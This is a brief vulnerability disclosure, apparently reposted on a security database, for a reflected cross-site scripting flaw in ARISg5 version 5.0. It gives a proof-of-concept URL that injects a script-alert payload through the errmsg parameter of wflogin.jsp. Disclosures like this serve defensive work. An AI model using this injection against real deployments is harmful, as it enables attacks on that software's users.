Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23310
HistoryMar 02, 2010 - 12:00 a.m.

ARISg5 (version 5.0) cross site scripting vulnerability

2010-03-0200:00:00
vulners.com
20

Hello,
Please see the following report:

ARISg5 (version 5.0) cross site scripting vulnerability

Application name: ARISg5 (arisglobal)
Version: 5.0
Class: Input Validation Error
Type: Cross Site Scripting (XSS)
Remote: Yes
Credit: Yaniv Miron
Exploit:

http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test
XSS')</script>

Yaniv Miron aka "Lament".
[email protected]